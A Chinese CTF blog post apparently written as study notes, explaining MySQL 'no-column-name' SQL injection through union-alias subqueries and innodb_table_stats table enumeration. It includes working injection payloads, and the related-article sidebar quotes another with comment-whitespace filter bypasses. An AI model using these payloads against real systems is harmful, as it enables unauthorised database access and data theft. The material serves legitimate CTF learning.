CTF常用sql注入(三)无列名注入

最新推荐文章于 2024-09-12 15:31:55 发布
最新推荐文章于 2024-09-12 15:31:55 发布
阅读量358 收藏
点赞数 4
分类专栏: web CTF 基础 文章标签: sql 数据库 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/140189235
版权

0x06 无列名

适用于无法正确的查出结果,比如把information_schema给过滤了

join

联合

select * from users;

在这里插入图片描述

select 1,2,3 union select * from users;

在这里插入图片描述

列名被替换成了1,2,3,
我们再利用子查询和别名查

select `2` from (select 1,2,3 union select * from users)a;

在这里插入图片描述
继续加大难度,不用反引号

select b from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
同时查询多个列

select concat(b,0x7e,c) from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
已知表名为flaga

password=\&username=,username=(select a from (select 1,2 as a,6 union select * from flaga limit 1,1)u)#

在这里插入图片描述
成功

0x07 InnoDb引擎

也是针对or的过滤来查询表名

innodb_index_stats和innodb_table_stats表

例句,缺点就是只能查表,配合无列名查询一起食用

(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#
baozongwi
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
列名注入----CTF例题:[SWPU2019]Web1
qq_64395221的博客
05-14 979
1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)as a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,10,21,22/**/&&/**/’1‘=’1---查出users的列名,但没有想要的信息。进入题目后发现有登录和注册接口,直接注册登录。
CTFsql注入之无列名注入的姿势
qq_71467825的博客
11-27 333
顾名思义,就是在不知道列名的情况下进行 sql 注入。在 mysql => 5 的版本中存在一个名为 information_schema 的库,里面记录着 mysql 中所有表的结构。通常,在 mysql sqli 中,我们会通过此库中的表去获取其他表的结构,也就是表名、列名等。但是这个库经常被 WAF 过滤。当我们通过暴力破解获取到表名后,如何利用呢?
SQL注入之 无列名注入 原理详解
Jay17的博客
09-17 697
SQL注入之 无列名注入 原理详解
CTFSQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
CTF常用sql注入(一)联合注入和宽字节
2301_81040377的博客
07-04 433
给自己总结一下sql注入常用姿势吧,记录一下学习。
二、sql注入(CTF技巧)
黑日里不灭的light
03-14 769
解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景。
CTFHub SQL注入(二)
2301_80911344的博客
04-10 946
适用情况:页面有数据库的报错信息报错信息必须是动态的、来自数据库的报错信息。网站写死的、自定义的报错提示不算。参数中添加单/双引号,页面报错才可进行下一步。?id=1' -- a参数中添加报错函数,检查报错信息是否正常回显?3. 脱库:.获取所有数据库?substr(, 1 , 31)),3) -- a.获取所有表?substr(, 1 , 31)),3) -- a.获取所有字段?
CTF-sql注入
K_DREAM_G的博客
05-25 866
太菜了,sql注入命令都忘了,简单的记录一下吧!题目来源:BUUCTF
CTF-SQL注入
weixin_44770698的博客
06-16 5187
CTF-SQL注入题目整理
CTFSQL注入常见题型整理.pdf
02-11
### CTFSQL注入常见题型整理 #### 前言 在网络安全竞赛(CTF)中,SQL注入是常见的攻击手法之一。通过对网站输入的数据进行构造,攻击者可以利用SQL注入漏洞获取敏感数据,甚至控制整个数据库。本文将详细介绍...
ctfsql注入下的一些小技巧.doc
10-07
"ctfsql注入下的一些小技巧" CTF 中的 SQL 注入技巧是指在 Capture The Flag 比赛中使用的 SQL 注入技术,以获取 Flags 或者其他敏感信息。以下是 CTFSQL 注入的一些小技巧: 一、注释符 在 MySQL 中,有两...
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 460
关于SQL注入的相关CTF笔记
[CTF] SQL注入的一些经验总结(未完待续)【更新:2022.11.25】
ZXW_NUDT的博客
11-17 6253
关于SQL注入的思维导图可以点开看一下大图
sqlalchemy JSON 字段写入时中文序列化问题
最新发布
llc的博客
09-12 162
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
在 Red Hat 上安装 SQL Server 2022 并创建数据库
2301_76664379的博客
09-12 884
本快速入门介绍如何在 Red Hat Enterprise Linux (RHEL) 8.x 或 9.x 上安装 SQL Server 2022 (16.x)。然后可以使用 sqlcmd 进行连接,创建第一个数据库并运行查询。注意:本教程需要用户输入和 Internet 连接。必须拥有 RHEL 8.x 计算机(内存至少为 2 GB)。如果以前安装了 SQL Server 的社区技术预览版 (CTP) 或候选发布 (RC) 版本,则必须先删除旧存储库,然后再执行这些步骤。
被低估的SQL
weixin_61431494的博客
09-03 1680
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQLServer分组查询
NaZiMeKiY的博客
09-08 438
例如我们再在日期后加入一个总人数在3人及以上的限制,那么就会用到聚合函数count(),但是where中是不能使用聚合函数作为限制条件的,所以我们需要用到having关键字。注意点:在分组查询中除了使用聚合函数的数据和使用group by和select后面的分组之外,数据都无法作为一列显示。可以不断使用union链接,但是相对应的是代码实在太过繁琐,所以我们还是使用group by的方式进行分组。五.在使用分组查询时添加多个限制条件,并且使用到聚合函数。例如我们加上一个出生日期的限制,只统计00后的数据。
mysqlSQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入在Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值